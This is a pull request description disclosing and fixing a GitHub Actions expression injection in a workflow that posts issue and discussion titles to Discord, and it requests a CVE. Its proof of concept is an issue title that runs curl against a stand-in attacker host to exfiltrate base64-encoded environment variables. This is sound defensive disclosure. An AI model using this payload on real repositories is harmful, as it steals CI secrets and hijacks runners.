Security fix: Refactor Discord notification workflow for issues and discussions

[nekros1xx]

Summary

The issue.yml workflow contains a GitHub Actions Expression Injection vulnerability (CWE-78: OS Command Injection) that allows arbitrary command execution on the GitHub Actions runner through crafted issue titles or discussion titles.

Vulnerability Details

Affected file: .github/workflows/issue.yml

The expressions ${{ github.event.issue.title }} and ${{ github.event.discussion.title }} are interpolated directly into the run: block before the shell interprets the script. If the issue/discussion title contains shell metacharacters, arbitrary commands execute on the runner.

Proof of Concept

An attacker creates an issue with the following title:

test$(curl https://attacker.example.com/$(printenv | base64))

After GitHub expression substitution, the shell executes:

TITLE="test$(curl https://attacker.example.com/$(printenv | base64))"

This exfiltrates all environment variables including DISCORD_WEBHOOK_URL_ISSUES to the attacker's server.

Fix Applied

All ${{ }} expressions referencing attacker-controllable data have been moved from the run: block to the env: block. When values are assigned to environment variables first, the shell treats them as data rather than code, preventing injection.

References

• [GitHub Security Lab: Keeping your GitHub Actions and workflows secure](https://securitylab.github.com/resources/github-actions-untrusted-input)
• [CWE-78: Improper Neutralization of Special Elements used in an OS Command](https://cwe.mitre.org/data/definitions/78.html)

[nekros1xx]

This PR addresses a security vulnerability.
Could you please create a security advisory for this issue so a CVE ID can be assigned?
I'm happy to help with the advisory details.